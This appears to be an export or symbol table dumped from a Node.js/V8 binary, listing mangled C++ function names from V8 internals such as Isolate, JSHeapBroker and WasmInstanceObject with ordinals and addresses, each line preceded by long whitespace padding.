                                                                                                                                                                                                                                    ?GetContextForMicrotask@JSReceiver@internal@v8@@SA?AV?$MaybeHandle@VNativeContext@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z73230x140960090
                                                                                                                                                                                                                                    ?GetContextFromRecorderContextId@Isolate@internal@v8@@QEAA?AV?$MaybeLocal@VContext@v8@@@3@VContextId@Recorder@metrics@3@@Z73240x140b6a480
                                                                                                                                                                                                                                    ?GetContextId@Recorder@metrics@v8@@SA?AVContextId@123@V?$Local@VContext@v8@@@3@@Z73250x140c84be0
                                                                                                                                                                                                                                    ?GetContextId@WebSnapshotSerializer@internal@v8@@AEAAIVContext@23@@Z73260x1407b50f0
                                                                                                                                                                                                                                    ?GetContextInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z73270x14057efc0
                                                                                                                                                                                                                                    ?GetContextInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z73280x14057f030
                                                                                                                                                                                                                                    ?GetContinuationPreservedEmbedderData@Context@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ73290x140c84c70
                                                                                                                                                                                                                                    ?GetControlInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z73300x14057f050
                                                                                                                                                                                                                                    ?GetCopy@StringsStorage@internal@v8@@QEAAPEBDPEBD@Z73310x14085e600
                                                                                                                                                                                                                                    ?GetCoupledControlEdge@Scheduler@compiler@internal@v8@@AEAA?AV?$Optional@H@base@4@PEAVNode@234@@Z73320x1411d9460
                                                                                                                                                                                                                                    ?GetCoverageBitmap@BasicBlockProfiler@internal@v8@@QEAA?AV?$vector@_NV?$allocator@_N@std@@@std@@PEAVIsolate@23@@Z73330x140ba1840
                                                                                                                                                                                                                                    ?GetCppHeap@Isolate@v8@@QEBAPEAVCppHeap@2@XZ73340x140c84d00
                                                                                                                                                                                                                                    ?GetCreationContext@JSReceiver@internal@v8@@QEAA?AV?$MaybeHandle@VNativeContext@internal@v8@@@23@XZ73350x140960240
                                                                                                                                                                                                                                    ?GetCreationContext@Object@v8@@QEAA?AV?$MaybeLocal@VContext@v8@@@2@XZ73360x140c84d10
                                                                                                                                                                                                                                    ?GetCreationContext@Object@v8@@SA?AV?$MaybeLocal@VContext@v8@@@2@AEBV?$PersistentBase@VObject@v8@@@2@@Z73370x140097760
                                                                                                                                                                                                                                    ?GetCreationContextChecked@Object@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ73380x140c84d60
                                                                                                                                                                                                                                    ?GetCreationThreadId@HeapBase@internal@cppgc@@QEBAHXZ73390x14053fe00
                                                                                                                                                                                                                                    ?GetCtrl@SwissNameDictionary@internal@v8@@AEAACH@Z73400x14053fe10
                                                                                                                                                                                                                                    ?GetCurrent@Isolate@v8@@SAPEAV12@XZ73410x14053eb50
                                                                                                                                                                                                                                    ?GetCurrentAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ73420x1411d2f80
                                                                                                                                                                                                                                    ?GetCurrentAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ73430x1411d3020
                                                                                                                                                                                                                                    ?GetCurrentContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ73440x140c84e10
                                                                                                                                                                                                                                    ?GetCurrentDepth@MicrotasksScope@v8@@SAHPEAVIsolate@2@@Z73450x140c84ec0
                                                                                                                                                                                                                                    ?GetCurrentEnvironment@node@@YAPEAVEnvironment@1@V?$Local@VContext@v8@@@v8@@@Z73460x14029e0f0
                                                                                                                                                                                                                                    ?GetCurrentEventLoop@node@@YAPEAUuv_loop_s@@PEAVIsolate@v8@@@Z73470x14029e140
                                                                                                                                                                                                                                    ?GetCurrentExternalSourcePosition@RawMachineAssembler@compiler@internal@v8@@QEBA?AU?$pair@PEBDH@std@@XZ73480x141219270
                                                                                                                                                                                                                                    ?GetCurrentLongTaskStats@Isolate@internal@v8@@QEAAPEAULongTaskStats@metrics@3@XZ73490x140b6a5a0
                                                                                                                                                                                                                                    ?GetCurrentMemoryUsage@AccountingAllocator@internal@v8@@QEBA_KXZ73500x1400978d0
                                                                                                                                                                                                                                    ?GetCurrentMemoryUsage@StringTable@internal@v8@@QEBA_KXZ73510x1408e4070
                                                                                                                                                                                                                                    ?GetCurrentOffset@EhFrameIterator@internal@v8@@QEBAHXZ73520x140573740
                                                                                                                                                                                                                                    ?GetCurrentPlatform@V8@internal@v8@@SAPEAVPlatform@3@XZ73530x140a643a0
                                                                                                                                                                                                                                    ?GetCurrentPosition@SourcePositionTable@compiler@internal@v8@@QEBA?AVSourcePosition@34@XZ73540x140509120
                                                                                                                                                                                                                                    ?GetCurrentProcessId@OS@base@v8@@SAHXZ73550x1402b3770
                                                                                                                                                                                                                                    ?GetCurrentStackPointerForLocalVariables@Stack@base@heap@@SAPEBXXZ73560x140520120
                                                                                                                                                                                                                                    ?GetCurrentStackPosition@Stack@base@v8@@SA?AUStackSlot@123@XZ73570x140ff3f60
                                                                                                                                                                                                                                    ?GetCurrentStackPosition@internal@v8@@YA_KXZ73580x1407ba430
                                                                                                                                                                                                                                    ?GetCurrentThreadId@OS@base@v8@@SAHXZ73590x1403ac000
                                                                                                                                                                                                                                    ?GetCurrentThreadId@ThreadId@internal@v8@@CAHXZ73600x140b58270
                                                                                                                                                                                                                                    ?GetData@ControlEquivalence@compiler@internal@v8@@AEAAPEAUNodeData@1234@PEAVNode@234@@Z73610x1411d9500
                                                                                                                                                                                                                                    ?GetData@Isolate@internal@v8@@QEBAPEAXI@Z73620x14053fe30
                                                                                                                                                                                                                                    ?GetData@Isolate@v8@@QEAAPEAXI@Z73630x140098320
                                                                                                                                                                                                                                    ?GetData@Scheduler@compiler@internal@v8@@AEAAPEAUSchedulerData@1234@PEAVNode@234@@Z73640x1411d9550
                                                                                                                                                                                                                                    ?GetDataFromSnapshotOnce@Context@v8@@AEAAPEA_K_K@Z73650x140c84ed0
                                                                                                                                                                                                                                    ?GetDataFromSnapshotOnce@Isolate@v8@@AEAAPEA_K_K@Z73660x140c84f00
                                                                                                                                                                                                                                    ?GetDataProperty@JSReceiver@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVLookupIterator@23@W4AllocationPolicy@23@@Z73670x1409603c0
                                                                                                                                                                                                                                    ?GetDataValue@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@USeqCstAccessTag@3@@Z73680x140933910
                                                                                                                                                                                                                                    ?GetDataValue@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@W4AllocationPolicy@23@@Z73690x140933990
                                                                                                                                                                                                                                    ?GetDaylightSavingsOffsetFromOS@DateCache@internal@v8@@UEAAH_J@Z73700x140818360
                                                                                                                                                                                                                                    ?GetDebugBreak@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@W45234@@Z73710x140a36320
                                                                                                                                                                                                                                    ?GetDebugBreakType@BreakIterator@internal@v8@@AEAA?AW4DebugBreakType@23@XZ73720x140bbac40
                                                                                                                                                                                                                                    ?GetDebugInfo@NativeModule@wasm@internal@v8@@QEAAPEAVDebugInfo@234@XZ73730x140662170
                                                                                                                                                                                                                                    ?GetDebugName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ73740x140c84f10
                                                                                                                                                                                                                                    ?GetDebugName@OptimizedCompilationInfo@internal@v8@@QEBA?AV?$unique_ptr@$$BY0A@DU?$default_delete@$$BY0A@D@std@@@std@@XZ73750x140be07b0
                                                                                                                                                                                                                                    ?GetDebugSideTableIfExists@DebugInfo@wasm@internal@v8@@QEBAPEAVDebugSideTable@234@PEBVWasmCode@234@@Z73760x1406575f0
                                                                                                                                                                                                                                    ?GetDeclarationScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ73770x14088ece0
                                                                                                                                                                                                                                    ?GetDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ73780x140c651b0
                                                                                                                                                                                                                                    ?GetDefaultStrings@Parser@internal@v8@@AEAAXPEAPEBVAstRawString@23@0@Z73790x14088ecf0
                                                                                                                                                                                                                                    ?GetDefaultWrapperDescriptor@LocalEmbedderHeapTracer@internal@v8@@CA?AUWrapperDescriptor@3@XZ73800x140a98c50
                                                                                                                                                                                                                                    ?GetDeoptInfos@CpuProfileNode@v8@@QEBAAEBV?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@XZ73810x1405f3290
                                                                                                                                                                                                                                    ?GetDeoptimizationEntry@CodeGenerator@compiler@internal@v8@@AEAAAEBVDeoptimizationEntry@234@PEAVInstruction@234@_K@Z73820x14106dd70
                                                                                                                                                                                                                                    ?GetDeoptimizationEntry@Deoptimizer@internal@v8@@SA?AW4Builtin@23@W4DeoptimizeKind@23@@Z73830x140baf020
                                                                                                                                                                                                                                    ?GetDeoptimizationEntry@InstructionSequence@compiler@internal@v8@@QEAAAEBVDeoptimizationEntry@234@H@Z73840x1410321d0
                                                                                                                                                                                                                                    ?GetDeoptimizationEntryCount@InstructionSequence@compiler@internal@v8@@QEBAHXZ73850x14057f120
                                                                                                                                                                                                                                    ?GetDeoptimizedCodeCount@Deoptimizer@internal@v8@@SAHPEAVIsolate@23@@Z73860x140baf040
                                                                                                                                                                                                                                    ?GetDerivedMap@JSFunction@internal@v8@@SA?AV?$MaybeHandle@VMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z73870x1409803e0
                                                                                                                                                                                                                                    ?GetDetailedStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z73880x140b6a5d0
                                                                                                                                                                                                                                    ?GetDetails@Descriptor@internal@v8@@QEBA?AVPropertyDetails@23@XZ73890x1400979f0
                                                                                                                                                                                                                                    ?GetDetails@MapUpdater@internal@v8@@AEBA?AVPropertyDetails@23@VInternalIndex@23@@Z73900x14092f8c0
                                                                                                                                                                                                                                    ?GetDispatchCounter@Interpreter@interpreter@internal@v8@@AEBA_KW4Bytecode@234@0@Z73910x140a314b0
                                                                                                                                                                                                                                    ?GetDispatchCountersObject@Interpreter@interpreter@internal@v8@@QEAA?AV?$Handle@VJSObject@internal@v8@@@34@XZ73920x140a314f0
                                                                                                                                                                                                                                    ?GetEffectInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z73930x14057f140
                                                                                                                                                                                                                                    ?GetEffectLevel@InstructionSelector@compiler@internal@v8@@QEBAHPEAVNode@234@@Z73940x14105dbc0
                                                                                                                                                                                                                                    ?GetEffectLevel@InstructionSelector@compiler@internal@v8@@QEBAHPEAVNode@234@PEAVFlagsContinuation@234@@Z73950x14105dbe0
                                                                                                                                                                                                                                    ?GetEhFrame@EhFrameWriter@internal@v8@@QEAAXPEAVCodeDesc@23@@Z73960x140b9bf10
                                                                                                                                                                                                                                    ?GetElapsedTimeInMs@IncrementalMarkingSchedule@internal@cppgc@@AEAANVTimeTicks@base@v8@@@Z73970x1405171a0
                                                                                                                                                                                                                                    ?GetElement@WasmArray@internal@v8@@QEAA?AVWasmValue@wasm@23@I@Z73980x140624e10
                                                                                                                                                                                                                                    ?GetEmbeddedCodeRange@Isolate@v8@@QEAAXPEAPEBXPEA_K@Z73990x140c84fe0
                                                                                                                                                                                                                                    ?GetEmbeddedObject@AssemblerBase@internal@v8@@IEBA?AV?$Handle@VHeapObject@internal@v8@@@23@_K@Z74000x140c0f250
                                                                                                                                                                                                                                    ?GetEmbedder@Version@internal@v8@@SAPEBDXZ74010x14061dcb0
                                                                                                                                                                                                                                    ?GetEmbedderData@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@H@Z74020x140097910
                                                                                                                                                                                                                                    ?GetEmbedderHeapTracer@Isolate@v8@@QEAAPEAVEmbedderHeapTracer@2@XZ74030x140c85030
                                                                                                                                                                                                                                    ?GetEmpty@OrderedHashMap@internal@v8@@SA?AVHeapObject@23@VReadOnlyRoots@23@@Z74040x1408fa770
                                                                                                                                                                                                                                    ?GetEmpty@OrderedHashSet@internal@v8@@SA?AVHeapObject@23@VReadOnlyRoots@23@@Z74050x1408fa780
                                                                                                                                                                                                                                    ?GetEmptyStateValues@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@XZ74060x1410e01b0
                                                                                                                                                                                                                                    ?GetEncodedSize@WasmExceptionPackage@internal@v8@@SAIPEBUWasmTag@wasm@23@@Z74070x140625020
                                                                                                                                                                                                                                    ?GetEncoding@TransitionsAccessor@internal@v8@@CA?AW4Encoding@123@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@@Z74080x14053fe40
                                                                                                                                                                                                                                    ?GetEncoding@TransitionsAccessor@internal@v8@@CA?AW4Encoding@123@PEAVIsolate@23@VMaybeObject@23@@Z74090x14053fe50
                                                                                                                                                                                                                                    ?GetEncoding@TransitionsAccessor@internal@v8@@CA?AW4Encoding@123@PEAVIsolate@23@VTransitionArray@23@@Z74100x14053fed0
                                                                                                                                                                                                                                    ?GetEndColumn@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z74110x140c85040
                                                                                                                                                                                                                                    ?GetEndColumn@Message@v8@@QEBAHXZ74120x140c85060
                                                                                                                                                                                                                                    ?GetEndPosition@Message@v8@@QEBAHXZ74130x140c851f0
                                                                                                                                                                                                                                    ?GetEndTime@CpuProfile@v8@@QEBA_JXZ74140x140c85360
                                                                                                                                                                                                                                    ?GetEnteredOrMicrotaskContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ74150x140c85380
                                                                                                                                                                                                                                    ?GetEntry@StringsStorage@internal@v8@@AEAAPEAU?$TemplateHashMapEntry@PEAXPEAX@base@3@PEBDH@Z74160x14085e6e0
                                                                                                                                                                                                                                    ?GetEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VObject@23@@Z74170x1408710e0
                                                                                                                                                                                                                                    ?GetEnvironmentIsolateData@node@@YAPEAVIsolateData@1@PEAVEnvironment@1@@Z74180x14029e1e0
                                                                                                                                                                                                                                    ?GetEstimatedMemoryUsage@CodeMap@internal@v8@@QEBA_KXZ74190x1408669d0
                                                                                                                                                                                                                                    ?GetEstimatedMemoryUsage@CpuProfiler@internal@v8@@QEBA_KXZ74200x14087ba20
                                                                                                                                                                                                                                    ?GetEstimatedMemoryUsage@ProfilerCodeObserver@internal@v8@@QEBA_KXZ74210x14087ba70
                                                                                                                                                                                                                                    ?GetException@Module@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ74220x140c85420
                                                                                                                                                                                                                                    ?GetExceptionTag@WasmExceptionPackage@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmExceptionPackage@internal@v8@@@23@@Z74230x1406250e0
                                                                                                                                                                                                                                    ?GetExceptionType@WasmModuleBuilder@wasm@internal@v8@@QEAAPEBV?$Signature@VValueType@wasm@internal@v8@@@34@H@Z74240x140634f70
                                                                                                                                                                                                                                    ?GetExceptionValues@WasmExceptionPackage@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmExceptionPackage@internal@v8@@@23@@Z74250x140625170
                                                                                                                                                                                                                                    ?GetExistingThreadLocal@Thread@base@v8@@SAPEAXH@Z74260x140ff10e0
                                                                                                                                                                                                                                    ?GetExportName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@W4ImportExportKindCode@234@I@Z74270x140657720
                                                                                                                                                                                                                                    ?GetExternalId@WebSnapshotSerializer@internal@v8@@AEAAIVHeapObject@23@@Z74280x1407b5130
                                                                                                                                                                                                                                    ?GetExternalOneByteStringResource@String@v8@@QEBAPEBVExternalOneByteStringResource@12@XZ74290x140c85530
                                                                                                                                                                                                                                    ?GetExternalStringResource@String@v8@@QEBAPEAVExternalStringResource@12@XZ74300x140097680
                                                                                                                                                                                                                                    ?GetExternalStringResourceBase@String@v8@@QEBAPEAVExternalStringResourceBase@12@PEAW4Encoding@12@@Z74310x1400976a0
                                                                                                                                                                                                                                    ?GetExternalStringResourceBaseSlow@String@v8@@AEBAPEAVExternalStringResourceBase@12@PEAW4Encoding@12@@Z74320x140c85580
                                                                                                                                                                                                                                    ?GetExternalStringResourceSlow@String@v8@@AEBAPEAVExternalStringResource@12@XZ74330x140c855f0
                                                                                                                                                                                                                                    ?GetExternallyCompiledFilename@Isolate@internal@v8@@QEBAPEBDH@Z74340x140b6a710
                                                                                                                                                                                                                                    ?GetExternallyCompiledFilenameCount@Isolate@internal@v8@@QEBAHXZ74350x140b6a730
                                                                                                                                                                                                                                    ?GetExternals@WebSnapshotSerializer@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@XZ74360x1407b5160
                                                                                                                                                                                                                                    ?GetExtrasBindingObject@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ74370x140c85630
                                                                                                                                                                                                                                    ?GetFeedback@FeedbackNexus@internal@v8@@QEBA?AVMaybeObject@23@XZ74380x14053fee0
                                                                                                                                                                                                                                    ?GetFeedback@JSHeapBroker@compiler@internal@v8@@AEBAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74390x1410b6f70
                                                                                                                                                                                                                                    ?GetFeedback@NexusConfig@internal@v8@@QEBA?AVMaybeObject@23@VFeedbackVector@23@VFeedbackSlot@23@@Z74400x14053ff10
                                                                                                                                                                                                                                    ?GetFeedbackExtra@FeedbackNexus@internal@v8@@QEBA?AVMaybeObject@23@XZ74410x14053ff30
                                                                                                                                                                                                                                    ?GetFeedbackForArrayOrObjectLiteral@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74420x1410b7020
                                                                                                                                                                                                                                    ?GetFeedbackForBinaryOperation@JSHeapBroker@compiler@internal@v8@@QEAA?AW4BinaryOperationHint@34@AEBUFeedbackSource@234@@Z74430x1410b7080
                                                                                                                                                                                                                                    ?GetFeedbackForCall@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74440x1410b7110
                                                                                                                                                                                                                                    ?GetFeedbackForCompareOperation@JSHeapBroker@compiler@internal@v8@@QEAA?AW4CompareOperationHint@34@AEBUFeedbackSource@234@@Z74450x1410b7170
                                                                                                                                                                                                                                    ?GetFeedbackForForIn@JSHeapBroker@compiler@internal@v8@@QEAA?AW4ForInHint@34@AEBUFeedbackSource@234@@Z74460x1410b7200
                                                                                                                                                                                                                                    ?GetFeedbackForGlobalAccess@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74470x1410b7290
                                                                                                                                                                                                                                    ?GetFeedbackForInstanceOf@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74480x1410b72f0
                                                                                                                                                                                                                                    ?GetFeedbackForPropertyAccess@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@W4AccessMode@234@V?$Optional@VNameRef@compiler@internal@v8@@@base@4@@Z74490x1410b7350
                                                                                                                                                                                                                                    ?GetFeedbackForRegExpLiteral@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74500x1410b73d0
                                                                                                                                                                                                                                    ?GetFeedbackForTemplateObject@JSHeapBroker@compiler@internal@v8@@QEAAAEBVProcessedFeedback@234@AEBUFeedbackSource@234@@Z74510x1410b7430
                                                                                                                                                                                                                                    ?GetFeedbackPair@FeedbackNexus@internal@v8@@QEBA?AU?$pair@VMaybeObject@internal@v8@@V123@@std@@XZ74520x14053ff60
                                                                                                                                                                                                                                    ?GetFeedbackPair@NexusConfig@internal@v8@@QEBA?AU?$pair@VMaybeObject@internal@v8@@V123@@std@@VFeedbackVector@23@VFeedbackSlot@23@@Z74530x1409aaf90
                                                                                                                                                                                                                                    ?GetFeedbackSlotKind@JSHeapBroker@compiler@internal@v8@@QEBA?AW4FeedbackSlotKind@34@AEBUFeedbackSource@234@@Z74540x1410b7490
                                                                                                                                                                                                                                    ?GetFieldDescriptorIndex@LookupIterator@internal@v8@@QEBAHXZ74550x1409338e0
                                                                                                                                                                                                                                    ?GetFieldIndex@LookupIterator@internal@v8@@QEBA?AVFieldIndex@23@XZ74560x1409339b0
                                                                                                                                                                                                                                    ?GetFieldIndexFor@MapRef@compiler@internal@v8@@QEBA?AVFieldIndex@34@VInternalIndex@34@@Z74570x1410183a0
                                                                                                                                                                                                                                    ?GetFieldName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@HH@Z74580x140657aa0
                                                                                                                                                                                                                                    ?GetFieldType@MapUpdater@internal@v8@@AEBA?AVFieldType@23@VInternalIndex@23@@Z74590x14092f950
                                                                                                                                                                                                                                    ?GetFilename@WasmModuleSourceMap@wasm@internal@v8@@QEBA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z74600x140630b70
                                                                                                                                                                                                                                    ?GetFillToAlign@Heap@internal@v8@@SAH_KW4AllocationAlignment@23@@Z74610x140b06c00
                                                                                                                                                                                                                                    ?GetFirstMap@FeedbackNexus@internal@v8@@QEBA?AVMap@23@XZ74620x1409ab030
                                                                                                                                                                                                                                    ?GetFixedSlotCount@Frame@compiler@internal@v8@@QEBAHXZ74630x140097a60
                                                                                                                                                                                                                                    ?GetFlag@OptimizedCompilationInfo@internal@v8@@AEBA_NW4Flag@123@@Z74640x140540120
                                                                                                                                                                                                                                    ?GetFlagOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z74650x140a534f0
                                                                                                                                                                                                                                    ?GetFlags@RegExp@v8@@QEBA?AW4Flags@12@XZ74660x140543550
                                                                                                                                                                                                                                    ?GetFlatContent@String@internal@v8@@QEAA?AVFlatContent@123@AEBV?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@23@@Z74670x140540130
                                                                                                                                                                                                                                    ?GetFlatContent@String@internal@v8@@QEAA?AVFlatContent@123@AEBV?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@23@AEBVSharedStringAccessGuardIfNeeded@23@@Z74680x140540260
                                                                                                                                                                                                                                    ?GetFloat32RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@VTruncation@234@@Z74690x1412557e0
                                                                                                                                                                                                                                    ?GetFloat64RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z74700x141255b10
                                                                                                                                                                                                                                    ?GetForInFeedback@FeedbackNexus@internal@v8@@QEBA?AW4ForInHint@23@XZ74710x1409ab070
                                                                                                                                                                                                                                    ?GetForThread@ThreadTicks@base@v8@@SA?AV123@AEBQEAX@Z74720x140ff1d90
                                                                                                                                                                                                                                    ?GetForegroundTaskRunner@Platform@cppgc@@UEAA?AV?$shared_ptr@VTaskRunner@v8@@@std@@XZ74730x140540370
                                                                                                                                                                                                                                    ?GetFormatted@StringsStorage@internal@v8@@QEAAPEBDPEBDZZ74740x14085e7b0
                                                                                                                                                                                                                                    ?GetFrame@StackTrace@v8@@QEBA?AV?$Local@VStackFrame@v8@@@2@PEAVIsolate@2@I@Z74750x140c856b0
                                                                                                                                                                                                                                    ?GetFrameCount@StackTrace@v8@@QEBAHXZ74760x140b7fd40
                                                                                                                                                                                                                                    ?GetFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAAPEAVFrameStateDescriptor@234@VFrameState@234@@Z74770x14105dc30
                                                                                                                                                                                                                                    ?GetFrameStateInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z74780x14057f210
                                                                                                                                                                                                                                    ?GetFrameStateInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z74790x14057f290
                                                                                                                                                                                                                                    ?GetFreeMemoryRangesWithin@OS@base@v8@@SA?AV?$vector@UMemoryRange@OS@base@v8@@V?$allocator@UMemoryRange@OS@base@v8@@@std@@@std@@_K000@Z74800x140ff3f70
                                                                                                                                                                                                                                    ?GetFromNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ74810x140c85730
                                                                                                                                                                                                                                    ?GetFunction@FunctionTemplate@v8@@QEAA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@@Z74820x140c85760
                                                                                                                                                                                                                                    ?GetFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVWasmFunctionBuilder@234@I@Z74830x140634f90
                                                                                                                                                                                                                                    ?GetFunctionAtAddress@DebugInfo@wasm@internal@v8@@QEAAAEBUWasmFunction@234@_K@Z74840x140657c60
                                                                                                                                                                                                                                    ?GetFunctionBytes@ModuleWireBytes@wasm@internal@v8@@QEBA?AV?$Vector@$$CBE@base@4@PEBUWasmFunction@234@@Z74850x140540380
                                                                                                                                                                                                                                    ?GetFunctionData@ScriptData@Coverage@debug@v8@@QEBA?AVFunctionData@234@_K@Z74860x140bca580
                                                                                                                                                                                                                                    ?GetFunctionDebuggingId@Debug@internal@v8@@QEAAHV?$Handle@VJSFunction@internal@v8@@@23@@Z74870x140bbaca0
                                                                                                                                                                                                                                    ?GetFunctionFromEval@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@W4LanguageMode@23@W4ParseRestriction@23@HHHW4ParsingWhileDebugging@23@@Z74880x140c05850
                                                                                                                                                                                                                                    ?GetFunctionFromString@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4ParseRestriction@23@H_N@Z74890x140c06080
                                                                                                                                                                                                                                    ?GetFunctionFromValidatedString@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@V?$MaybeHandle@VString@internal@v8@@@23@W4ParseRestriction@23@H@Z74900x140c06100
                                                                                                                                                                                                                                    ?GetFunctionId@WebSnapshotSerializer@internal@v8@@AEAAIVJSFunction@23@@Z74910x1407b5190
                                                                                                                                                                                                                                    ?GetFunctionIndexFromJumpTableSlot@NativeModule@wasm@internal@v8@@QEBAI_K@Z74920x140662230
                                                                                                                                                                                                                                    ?GetFunctionName@CallSiteInfo@internal@v8@@SA?AV?$Handle@VPrimitiveHeapObject@internal@v8@@@23@V?$Handle@VCallSiteInfo@internal@v8@@@23@@Z74930x1409fe510
                                                                                                                                                                                                                                    ?GetFunctionName@CodeEvent@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ74940x140509130
                                                                                                                                                                                                                                    ?GetFunctionName@CpuProfileNode@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ74950x140c85a70
                                                                                                                                                                                                                                    ?GetFunctionName@ProfilerListener@internal@v8@@AEAAPEBDVSharedFunctionInfo@23@@Z74960x140863920
                                                                                                                                                                                                                                    ?GetFunctionName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ74970x140c85ad0
                                                                                                                                                                                                                                    ?GetFunctionNameStr@CpuProfileNode@v8@@QEBAPEBDXZ74980x140c85b70
                                                                                                                                                                                                                                    ?GetFunctionOffsets@AsmJsOffsetInformation@wasm@internal@v8@@QEAA?AU?$pair@HH@std@@H@Z74990x14062e620
                                                                                                                                                                                                                                    ?GetGlobalBufferAndIndex@WasmInstanceObject@internal@v8@@SA?AU?$pair@V?$Handle@VFixedArray@internal@v8@@@internal@v8@@I@std@@V?$Handle@VWasmInstanceObject@internal@v8@@@23@AEBUWasmGlobal@wasm@23@@Z75000x140625830
                                                                                                                                                                                                                                    ?GetGlobalStorage@WasmInstanceObject@internal@v8@@SAPEAEV?$Handle@VWasmInstanceObject@internal@v8@@@23@AEBUWasmGlobal@wasm@23@@Z75010x140625950
                                                                                                                                                                                                                                    ?GetGlobalValue@WasmInstanceObject@internal@v8@@SA?AVWasmValue@wasm@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@AEBUWasmGlobal@523@@Z75020x140625980
                                                                                                                                                                                                                                    ?GetHandle@PersistentHandles@internal@v8@@AEAAPEA_K_K@Z75030x140b4a8a0
                                                                                                                                                                                                                                    ?GetHandler@Proxy@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ75040x140bc9f20
                                                                                                                                                                                                                                    ?GetHasInstance@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z75050x140c85b80
                                                                                                                                                                                                                                    ?GetHash@OrderedHashMap@internal@v8@@SA_KPEAVIsolate@23@_K@Z75060x1408fa790
                                                                                                                                                                                                                                    ?GetHashCore@StringHasher@internal@v8@@SAII@Z75070x1405403a0
                                                                                                                                                                                                                                    ?GetHeaderSize@JSObject@internal@v8@@SAHW4InstanceType@23@_N@Z75080x1409608f0
                                                                                                                                                                                                                                    ?GetHeapCodeAndMetadataStatistics@Isolate@v8@@QEAA_NPEAVHeapCodeStatistics@2@@Z75090x140c85b90
